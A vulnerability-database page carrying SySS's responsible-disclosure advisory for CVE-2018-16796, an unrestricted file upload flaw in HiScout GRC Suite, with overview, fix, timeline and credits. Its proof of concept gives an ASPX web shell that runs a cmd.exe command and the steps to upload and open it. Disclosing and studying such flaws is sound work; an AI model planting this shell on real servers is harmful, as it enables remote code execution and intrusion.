Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HiScout GRC Suite File Upload

🗓️ 13 Sep 2018 00:00:00Reported by Sebastian AuwaerterType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 71 Views

HiScout GRC Suite allows unrestricted file upload leading to remote code execution. Upgrade to version 3.1.

Related
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2018-16796
13 Sep 201816:00
cve
Cvelist		CVE-2018-16796
13 Sep 201816:00
cvelist
EUVD		EUVD-2018-8596
7 Oct 202500:30
euvd
NVD		CVE-2018-16796
13 Sep 201816:29
nvd
Prion		Design/Logic Flaw
13 Sep 201816:29
prion
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2018-015   
Product: HiScout GRC Suite  
Manufacturer: HiScout GmbH  
Affected Version(s): < 3.1.5  
Tested Version(s): 3.1.3.12  
Vulnerability Type: Unrestricted Upload of File with Dangerous Type  
Risk Level: High  
Solution Status: Fixed  
Manufacturer Notification: 2018-07-26  
Solution Date: 2018-09-03  
Public Disclosure: 2018-09-12  
CVE Reference: CVE-2018-16796  
Author of Advisory: Sebastian Auwaerter, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
HiScout GRC Suite is a platform for managing IT governance, risk and  
compliance.  
  
The manufacturer describes the various modules of the   
product as follows (see [1]):  
  
The HiScout ISM module is geared toward meeting the requirements of the   
ISO 27000 series of international standards, and provides a reliable   
basis for the information management systems control loop.  
  
The HiScout Grundschutz module fully supports operations toward BSI   
standard 100-2. HiScout Grundschutz comes geared to BSI specifications   
and can smoothly incorporate existing data from other tools, such as   
GSTOOL. The HiScout BCM module is a new generation of BCM tools that can  
generate quantifiable benefits even when there is no emergency, and is   
therefore not only used to help you to plan for circumstances that will  
hopefully never arise.   
  
Due to a missing check of the file extension and the content of uploaded  
files in place of an image, HiScout GRC Suite is vulnerable to a remote  
code execution vulnerability.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
An authenticated attacker with the permission to edit or add a  
"WebSiteElement" to the "content" pages is able to upload any file  
with any file extension to the data directory of the application. This  
directory is in the web root and the uploaded file is executed on   
the server if ".aspx" is chosen as the file extension and if the file   
contains aspx source code. Any commands can be executed with the  
permissions of the web server user on the server by exploiting this  
vulnerability.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC)  
  
To reproduce this issue on a German instance of HiScout GRC Suite,  
choose "Inhalte" -> "Neu" -> "WebSiteElement" (The english equivalent  
is "Content" -> "New" -> "WebSiteElement") and upload the following   
file to the file upload on the right-hand side of the "InfoEditor":  
  
filename: whoami.aspx  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
<%@ Page Language="C#" Debug="true" Trace="false" %>  
<%@ Import Namespace="System.Diagnostics" %>  
<%@ Import Namespace="System.IO" %>  
<html>  
<head>  
<title>Code Execution PoC</title>  
</head>  
<body>  
<%   
String a = "whoami";  
ProcessStartInfo psi = new ProcessStartInfo();  
psi.FileName = "cmd.exe";  
psi.Arguments = "/c "+ a;  
psi.RedirectStandardOutput = true;  
psi.UseShellExecute = false;  
Process p = Process.Start(psi);  
StreamReader stmrdr = p.StandardOutput;  
String s = stmrdr.ReadToEnd();  
stmrdr.Close();  
  
Response.Write("<li>");  
Response.Write(s);  
Response.Write("</li>");  
%>  
</body>  
</html>  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Now, either visit the uploaded file by navigating to   
http(s)://<vulnerable-server>/<image-directory>/whoami.aspx or open the  
page where the newly created "WebSiteElement" is shown and follow the  
path of the "image" that is not loaded properly.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
Update to software version to 3.1.5  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2018-07-25: Vulnerability discovered  
2018-07-26: Vulnerability reported to manufacturer  
2018-09-03: Patch released by manufacturer  
2018-09-12: Public disclosure of vulnerability  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for HiScout BCM   
https://www.hiscout.com/en/  
[2] SySS Security Advisory SYSS-2018-015  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-015.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Sebastian Auwaerter of SySS   
GmbH.  
  
E-Mail: sebastian.auwaerter at syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc  
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6   
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: https://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
  
iQIcBAEBCgAGBQJbmQCjAAoJEOmjDUji8Ki2BwQP/2uq786EGw1yi9a3TjG5aQK3  
HgLjlYajwpjInpA3I9A40C+udGFfmmTRaMxC9jcWGxae8qwDaFG00fjHmRNWEAK6  
6cuMFyBScf1DOmT68GqYKQCm27xmU0iYbPUWbnFHKslKnGLfO7Y4WihfeF/YY+uo  
+cBtWtrm3QV5y7xCpnLHFT02FHLBC/84mBI9vqag9ipycxau7ekSu1SkmaOgYwXM  
yIpLlVLeoOTbJNJLMVGrs5Dwz6lSlZ5EgB5PS9ANyoNdGvJDfp+8fOegniiePlWL  
2heLJt0rchKbxKpAUl7bF9ftJAAOxEhk1SH6xsO/8/VKQNCWwJD0n0GLGWViWHQ8  
DhVTGP4BKnlniN9yT6S5WVBD5YikylnmRqBhp8SDrcPNO9xwdol6QmeI7+PEuzlq  
ILBnypZEhdU92wAwHY4njQ0MrqDR6R70rgBMk8k+Ep1UZjyGZAeVz74O8hg/pFji  
uP2hfzc3XXHFiydK2dEkXiqdhm8GW5ZRtdePCbhvwjQ8osyx8KAVc9eejKWe328s  
4IQ83DtZ04fWmD8FflqML1Omdw6Gsq6d+bhnwQUOJfAVzbItiHm+ULBt6l4G/mX6  
RNf4aWgkc2nCI26GsEeP3yr6PROQAIoO3qGvAM+p/kwdduSPmyszEMskttL4aM/r  
gJzmL3W4B24OGK8xigDk  
=GwUf  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Sep 2018 00:00Current
8.9High risk
Vulners AI Score8.9
EPSS0.00719
hiscout grc suitefile uploadremote code executionupgradevulnerabilitycve-2018-16796security advisory
71